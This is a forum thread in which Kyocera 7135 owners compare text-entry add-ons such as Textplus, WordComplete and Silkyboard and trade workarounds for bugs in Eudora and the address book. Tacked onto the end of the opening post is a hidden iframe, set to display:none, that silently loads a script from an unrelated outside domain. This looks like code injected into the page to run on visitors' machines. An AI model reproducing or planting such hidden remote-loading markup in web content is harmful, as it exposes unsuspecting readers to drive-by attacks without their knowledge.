+ Reply to Thread
Page 1 of 2 1 2 LastLast

Best Text Entry Software for the 7135

OK, we don't have T9 or Predictive Text Entry on the 7135. I've been using Textplus for over a year on my m505 and it works rather well on the 7135 also. However, it sometimes doesn't act right in the "Messages" app and rarely acts right in "Eudora Mail". My work-around is to create the message in a memo and then copy/paste into the app of choice. That takes a little extra time but it works to speed up text enty and minimize typos.

Textplus has an upgrade and there is no free upgrade for existing users . Instead of dropping more $$$ into it, I'm wondering if there is something better being used on the 7135.

Wordcomplete? Quickwrite? Should this be a poll? Has anyone done a comparison?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

TextPlus with Silkyboard would be an invaluable combo. I use DocumentsToGo instead of Eudora Mail so it might not be an issue for me.

pdageek

Originally posted by pdageek
    I use DocumentsToGo instead of Eudora Mail so it might not be an issue for me.

pdageek
    Have you noticed that after installing Inbox 2 Go, Documents 2 Go is sluggish almost to the point of not being usable when you try to edit Word files (note, no trouble when viewing them, which works fine, but actually editing them...)

Has anyone else noticed this?

Re: Best Text Entry Software for the 7135

Originally posted by Beryl
    My work-around is to create the message in a memo and then copy/paste into the app of choice. That takes a little extra time but it works to speed up text enty and minimize typos..

Wordcomplete? Quickwrite? Should this be a poll? Has anyone done a comparison?
    Sorry, I can't do any comparisons, but I have used WordComplete for a few years now (except since I got the Treo and generally am not holding the stylus when inputting text), and it was very helpful and customizable. I also had to do a similar workaround to yours Beryl... some apps that didn't have the little dotted lines did not support WordComplete, so I would also use the memo pad... it's definitely a time saver over straight graffiti
    Please visit my picture site: Robert-O-Rama :)

The current version of Textplus (5.1) works just fine in Eudora. I just upgraded (since I found that I had purchased it back in 2000, I think this was justified!). The previous version of Textplus had been very sluggish for me, so I had switched to wordcomplete-- that works fine, but I think Textplus is better (eg, can exclude certain apps, can add phrases, both of which are useful). However, as noted, this works best with Silkyboard, which many of us are still waiting for. I have heard nothing back from the developer other than a vague "in the future". This would make text input *so* much easier again....

Originally posted by pdageek
    TextPlus with Silkyboard would be an invaluable combo. I use DocumentsToGo instead of Eudora Mail so it might not be an issue for me.

pdageek
    I have to agree with the Geek. I became addicted to SilkyBoard on my 6035 and really miss it now. SilkyBoard combined with a predictive text add-on is the killer text entry combination.
    Dave

Thanks all. Wordcomplete (the demo) worked much like Textplus but with a smaller footprint. It didn't work with Eudora so I went ahead and upgraded to V5.1. You are right, pdadoc, the upgrade does work with Eudora.

Never tried Silkyboard but you folks have me sold.

Originally posted by mghaffar
    Have you noticed that after installing Inbox 2 Go, Documents 2 Go is sluggish almost to the point of not being usable when you try to edit Word files (note, no trouble when viewing them, which works fine, but actually editing them...)

Has anyone else noticed this?
    I haven't had this problem. Are you sure you have the latest versions?

InboxToGo 2.001 (73)
    DocsToGo 5.004 (587)

Originally posted by Beryl
    Never tried Silkyboard but you folks have me sold.
    I have never tried it either, but I am sold also.

Just registered as a 7135 user on the authors website to receive a newsletter when the program is available.

It's at the VERY bottom of the this page: http://www.silkyboard.com/models.htm

If you are interested...register. Maybe the author will take notice and get the 7135 version out sooner. Heck, he may also be looking for 7135 beta testers.

Jeff
    Jeff
    Tampa FL
    Blackberry 7230 w/ T-Mobile

E-mail: djjefft@aol.com
    AIM: djjefft

Beryl--

Have you tried using TextPlus with just the 7135 keypad? I absolutely hate using graffiti. That would hold me over until Silkyboard.

@ pdageek
    Yep, it works using graffiti, keyboard, and keypad.
    iPhone 4S BB8830/Treo700wx/Treo700w/ XV6600/Treo600/Kyo7135

I can scroll through the list with the jog dial but how do you select the word you want to insert?

Finger or stylus is the only way I know. Wish the OK button would select it.
    iPhone 4S BB8830/Treo700wx/Treo700w/ XV6600/Treo600/Kyo7135

predictive text/t9 english

all my phones for the last 2 years have offered this feature and i became quite good at it,why would they remove this relatively basic feature,it would make sms and other things so much eaiser than pullin out the stylus all the time or pushing the 6 key three times to type the letter o

It was on the first round of beta models, but did not work well with them at all, so they pulled it.
    ~'kito
    pdaPhoneHome Moderator

Yeah, it doesn't bother me as much as it would if I didn't use text entry enhancement pgms & TAKEphONE.

Speaking of, FYI, Textplus, when enabled for applications, interferes with dialing from the addressbook without the stylus

I really wish the 7135 had T9 text input for Palm and phone use. I wonder what the issues were with the initial beta testers.

T9 seems like a good system -- I surprised 7135 testers didn't like it.

Glenn

Originally posted by HoTSynC
    Speaking of, FYI, Textplus, when enabled for applications, interferes with dialing from the addressbook without the stylus
    Curious -- how did it interfere? I had it turned on for all apps and was able to select and dial with the OK and phone buttons (no stylus).

The popup alternatives annoyed me once because I have people who I contact frequently in my book with initials for the last name. So, I turned it off for all apps and then turned it on for selected apps leaving out Addressbook.

(That was before I started to use TAKEphoNE.)

What happens for me is that when I am using my hands only, normal phone dialing would be:

1) Press the address book button
    2) Use the keypad to enter some characters to advance to the name I want
    3) Press "Ok" on the name to access a non-default number for that contact
    4) Scroll to the number to dial
    5) Press send

After doing that, it will switch to the phone app and dial the number. After installing and turning on TextPlus, performing the same operation, it switches to the phone app yet doesn't dial the number.

It only does this if you are dialing a number that is not the default. When I disable textplus anywhere, it stops doing it. I even tried just excluding the address book and phone app, and it still does it. Then I excluded all to discover it was the mere enabling of text anywhere that was doing it. I tried every combo to get it to work, but the only thing that did was disabling it and using the text plus app to creat the message and paste it elsewhere, which is not good for my needs (extra step I don't want).